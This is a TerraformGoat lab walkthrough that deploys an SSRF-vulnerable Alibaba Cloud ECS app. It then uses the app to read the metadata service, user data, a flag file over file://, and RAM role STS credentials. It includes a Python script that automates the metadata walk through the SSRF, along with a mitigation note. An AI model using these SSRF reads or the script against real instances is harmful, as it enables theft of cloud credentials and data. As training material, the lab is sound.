This scenario builds an Alibaba Cloud ECS instance that hosts a web application with a server-side request forgery (SSRF) vulnerability.
After the environment is deployed with Terraform, you can use the SSRF to reach the ECS instance metadata service (100.100.100.200) from the instance's own network position and read instance metadata, user data and other information that is not reachable from outside.
Execute the following command in the TerraformGoat container:

```
cd /TerraformGoat/aliyun/ecs/ecs_ssrf/
```
Configure your Alibaba Cloud access credentials:

```
aliyun configure
```

You can create and view an AccessKey on the AccessKey page of the Alibaba Cloud console. Use a key from a dedicated test account or RAM user, not an account-level key, because Terraform needs permission to create and delete ECS, VPC and security-group resources.
Deploy the vulnerable environment:

```
terraform init
terraform apply
```

When the terminal prompts `Enter a value:`, enter `yes`.

After the environment is set up, the access address of the scenario is shown under `Outputs`. Open that address in a browser.
Because the vulnerable application runs on the ECS instance, requests it makes on our behalf originate from the instance itself, so we can use the SSRF to read ECS metadata, user data and other information from the metadata service, which is only reachable from inside the instance.

Read metadata (the root of the metadata tree is a directory listing; entries ending in `/` are subdirectories that can be walked the same way):

```
http://100.100.100.200/latest/meta-data/
```

Read user data. This only works when the target instance has user data configured; otherwise the metadata service returns nothing and the SSRF request appears to be disconnected:

```
http://100.100.100.200/latest/user-data/
```

The user data of this scenario reveals that there is a flag file in the root directory of the instance. Try using the SSRF to read that file through the `file://` scheme:

```
file:///flag69152201.txt
```

If the flag contents are returned, the flag file has been read successfully.

Two practitioner notes. First, the metadata path `/latest/meta-data/ram/security-credentials/` lists any RAM role attached to the instance, and reading the role name under that path returns temporary STS credentials, which is usually the highest-impact target of an ECS SSRF. Second, if an instance is switched to the metadata service's hardened (token-based) mode, reads require a token obtained with a `PUT` to `/latest/api/token` and sent back in the `X-aliyun-ecs-metadata-token` header; a plain `GET`-only SSRF cannot obtain that token, so enabling hardened mode is the standard mitigation for this class of attack.
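The following script is an added example, not part of the TerraformGoat scenario code. It automates the three reads above through an SSRF parameter: it walks the metadata directory listing recursively, fetches user data while treating an empty or dropped response as "not configured", and reads a local file over `file://`. The vulnerable endpoint URL and the query parameter name (`url`) are assumptions, since the scenario page does not name them; the fake fetcher and the metadata tree it serves are constructed sample data so the script runs offline.

```python
"""Enumerate ECS instance metadata through an SSRF (added example, not TerraformGoat code)."""
from typing import Callable, Dict, Optional
from urllib.parse import quote
import urllib.error
import urllib.request

METADATA_HOST = "http://100.100.100.200"

Fetch = Callable[[str], Optional[str]]  # fetch(target_url) -> body text, or None if nothing came back


def ssrf_url(target: str, ssrf_endpoint: str, param: str = "url") -> str:
    """Build the request the vulnerable page will proxy for us.

    ssrf_endpoint and param are assumptions: the scenario's real parameter name may differ.
    """
    return f"{ssrf_endpoint}?{param}={quote(target, safe='')}"


def http_fetch_via_ssrf(ssrf_endpoint: str, param: str = "url", timeout: float = 5.0) -> Fetch:
    """Return a fetcher that sends each target URL through the live SSRF endpoint."""
    def fetch(target: str) -> Optional[str]:
        try:
            with urllib.request.urlopen(ssrf_url(target, ssrf_endpoint, param), timeout=timeout) as resp:
                body = resp.read().decode(errors="replace")
                return body if body else None
        except (urllib.error.URLError, OSError):
            # The metadata service drops the connection for unset user-data; the
            # proxying app then usually errors out. Treat that as "nothing there".
            return None
    return fetch


def walk_metadata(fetch: Fetch, path: str = "/latest/meta-data/", depth: int = 6) -> Dict[str, str]:
    """Recursively read the metadata tree.

    A path ending in '/' is a directory whose body lists child names, one per line;
    child names ending in '/' are subdirectories. Leaves are collected as path -> value.
    """
    results: Dict[str, str] = {}
    body = fetch(METADATA_HOST + path)
    if body is None:
        return results
    if not path.endswith("/"):
        results[path] = body
        return results
    if depth == 0:  # guard against pathological listings
        return results
    for line in body.splitlines():
        name = line.strip()
        if name:
            results.update(walk_metadata(fetch, path + name, depth - 1))
    return results


def read_user_data(fetch: Fetch) -> Optional[str]:
    """Return the instance user data, or None when the instance has none configured."""
    return fetch(METADATA_HOST + "/latest/user-data/")


def read_local_file(fetch: Fetch, path: str) -> Optional[str]:
    """Read a file on the instance through the file:// scheme, if the SSRF allows it."""
    return fetch("file://" + path)


# --- constructed sample data so the example runs offline -----------------------------
FAKE_TREE = {
    "/latest/meta-data/": "instance-id\nregion-id\nram/\n",
    "/latest/meta-data/instance-id": "i-example",
    "/latest/meta-data/region-id": "cn-hangzhou",
    "/latest/meta-data/ram/": "security-credentials/\n",
    "/latest/meta-data/ram/security-credentials/": "example-role\n",
    "/latest/meta-data/ram/security-credentials/example-role": '{"AccessKeyId":"STS.example"}',
    "/latest/user-data/": "#!/bin/sh\necho flag > /flag69152201.txt\n",
}
FAKE_FILES = {"/flag69152201.txt": "constructed-flag-value"}


def fake_fetch(target: str) -> Optional[str]:
    """Stand-in for the SSRF proxy: serves the constructed metadata tree and file."""
    if target.startswith(METADATA_HOST):
        return FAKE_TREE.get(target[len(METADATA_HOST):])
    if target.startswith("file://"):
        return FAKE_FILES.get(target[len("file://"):])
    return None


if __name__ == "__main__":
    # Against the real scenario, replace fake_fetch with
    # http_fetch_via_ssrf("http://<scenario-address>/<vulnerable-path>", param="url").
    fetch = fake_fetch
    for key, value in sorted(walk_metadata(fetch).items()):
        print(f"{key}: {value}")
    print("user-data:", read_user_data(fetch))
    print("flag:", read_local_file(fetch, "/flag69152201.txt"))
```

The walker stops at leaves and at `None` responses, so the RAM credential path shows up only when a role is attached, and user data is reported as `None` rather than as an error when the instance has none.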
When you are finished, destroy the environment so the vulnerable instance does not keep running in your account:

```
terraform destroy
```